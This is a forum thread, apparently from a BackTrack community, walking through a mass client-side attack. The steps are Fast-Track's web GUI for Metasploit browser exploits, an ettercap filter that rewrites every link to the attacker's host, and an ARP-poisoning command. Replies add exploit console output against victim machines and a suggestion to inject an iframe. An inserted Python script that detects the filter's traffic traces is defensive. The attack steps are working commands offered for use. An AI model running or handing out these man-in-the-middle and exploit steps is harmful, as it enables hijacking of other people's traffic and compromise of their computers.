Pwnage. lol. I got a shell and you didn't haha. Just kidding. Thanks for teaching me how to do this, I really appreciate it.
first start up fast-track and run the web gui mode -g
Code:
./fast-track.py -g
now open a web browser to this page http://127.0.0.1:44444/metaclient
simply enter your IP address to listen on and click "launch attack"... for example I'll use 192.168.1.5
you should see 3 consoles pop up... you can minimize them
now we need to compile our filter that we will use with ettercap. you must make sure you replace the IP address in the filter to match that of your server... save this as massclient.filter
Code:
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        # note: replacement string is same length as original string
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    replace("a href=", "a href=\"http://192.168.1.5\" ");
    replace("a href=", "a href=\"http://192.168.1.5\" ");
    msg("Filter Ran.\n");
}
then in a new console compile the filter with this command
Code:
etterfilter massclient.filter -o massclient.ef
now start ettercap with this command
Code:
ettercap -T -q -F massclient.ef -M ARP /192.168.1.2/ //
now wait for your target to visit the evil webpage that fast-track has set up and check your sessions -l for a shell
I don't take credit for this... I just took someone else's tutorial and made a quick change to the filter... for more info check these links
http://www.irongeek.com/i.php?page=s...ettercapfilter
http://forums.remote-exploit.org/sho...t=12885&page=9
I think dr_green also has one but can't find it at this time
this was a quick walkthrough... I hope someone finds this useful... let me know if I made mistakes... the filter is also kinda buggy but it gets the job done...
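The filter above leaves two traces in traffic that a defender can look for: the request header "Accept-Encoding" becomes the same-length "Accept-Rubbish!" (which keeps the reply uncompressed so the filter can match it), and every "a href=" in the reply gains a leading value pointing at the injected host, so the original value is left dangling as a second quoted token right after it. The script below is an added example written for this thread, not code from the thread, from ettercap or from Fast-Track; the sample request and responses are constructed, and 192.168.1.5 is simply the example address used in the post.

```python
#!/usr/bin/env python3
"""Defender-side check for the traces the ettercap filter in this thread
leaves in HTTP traffic. Added example, not part of the thread, ettercap or
Fast-Track. It assumes exactly the two rewrites the filter performs:
'Accept-Encoding' -> 'Accept-Rubbish!' on the request, and a leading
'a href="http://<injected host>" ' prepended to every 'a href=' on the reply."""
import re
from collections import Counter
from urllib.parse import urlparse

# The rewritten header, matched as a header line (start of line, then colon).
MANGLED_HEADER = re.compile(rb"^accept-rubbish!\s*:", re.I | re.M)
# An href value immediately followed by a second quoted token is what a
# replace() that prepends a new value in front of the original one leaves behind.
DOUBLE_VALUE = re.compile(rb'href="([^"]*)"\s+"([^"]*)"', re.I)
ANY_HREF = re.compile(rb'href="([^"]*)"', re.I)


def request_findings(raw_request: bytes) -> list:
    """Findings for one raw HTTP request; only the header block is inspected."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    findings = []
    if MANGLED_HEADER.search(head):
        findings.append("Accept-Encoding header rewritten to Accept-Rubbish!")
    return findings


def response_findings(raw_response: bytes, site_host: str) -> dict:
    """Count doubled href values and absolute links to hosts other than site_host.

    A page whose anchors all resolve to one host that is not the site itself,
    each followed by a stray quoted token, matches the filter's rewrite."""
    body = raw_response.split(b"\r\n\r\n", 1)[-1]
    doubled = len(DOUBLE_VALUE.findall(body))
    hosts = Counter()
    for value in ANY_HREF.findall(body):
        host = urlparse(value.decode("ascii", errors="replace")).hostname
        if host and host != site_host:  # relative links have no host; own host is fine
            hosts[host] += 1
    return {"doubled": doubled, "foreign_hosts": dict(hosts)}


# Constructed samples: one request and one response as the filter would leave
# them, plus the same page untouched for comparison.
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"Accept-Rubbish!: gzip, deflate\r\n\r\n")
TAMPERED_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                     b'<html><body><a href="http://192.168.1.5" "/login">Login</a>'
                     b'<a href="http://192.168.1.5" "http://www.example.com/help">Help</a>'
                     b"</body></html>")
CLEAN_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  b'<html><body><a href="/login">Login</a>'
                  b'<a href="http://www.example.com/help">Help</a></body></html>')

if __name__ == "__main__":
    print(request_findings(SAMPLE_REQUEST))
    print(response_findings(TAMPERED_RESPONSE, "www.example.com"))
    print(response_findings(CLEAN_RESPONSE, "www.example.com"))
```

Run against a pcap-derived stream or proxy log, the same two checks apply per request/response pair; the doubled-value pattern is the more specific signal, while a single foreign host owning every anchor on a page is the cheaper one to watch across many pages.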
Is there a version of this that works on metasploit instead of backtrack?
This is Backtrack Forum, not how to do things on Windows. You should use google asking the same question, you will get more success.
Or simply start using backtrack, you can do it, like most of us do.
Ok, got everything working but can't get a shell, what am I doing wrong?
stalls here:
Victim machine has definitely been pwned..
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending exploit to 192.168.1.105:1626...
[*] Started bind handler
[*] Sending ANI file to 192.168.1.105:1625...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.105:1625...
[*] Sending exploit to 192.168.1.105:1626...
[*] Sending exploit HTML to 192.168.1.105:1628...
[*] Sending HTML to 192.168.1.105:1631...
[*] Sending HTML to 192.168.1.105:1632...
[*] Sending HTML to 192.168.1.105:1633...
[*] Sending exploit to 192.168.1.105:1634...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending ANI file to 192.168.1.105:1638...
lol..but it is asking to install ActiveX. Also, victims are WINXP SP2, and a Vista machine, got the same output for both.
may just want to put an iframe instead of hijacking ALL the links lol
just put before </body> the iframe of the evil server ;P
NOTE: mass client side will crash IE7 so beware.
Got back from poker night last night after a couple beers and coded the ettercap filters into Fast-Track's Mass Client Attack, works great. Added it to the menu mode, gui, and command line. I'll push the updates on Monday. Nice job BigMac, appreciate the help on getting it to work, made it super simple for me to pop it into my code.
Screenshots attached:
http://img223.imageshack.us/img223/9709/ettercapcg2.jpg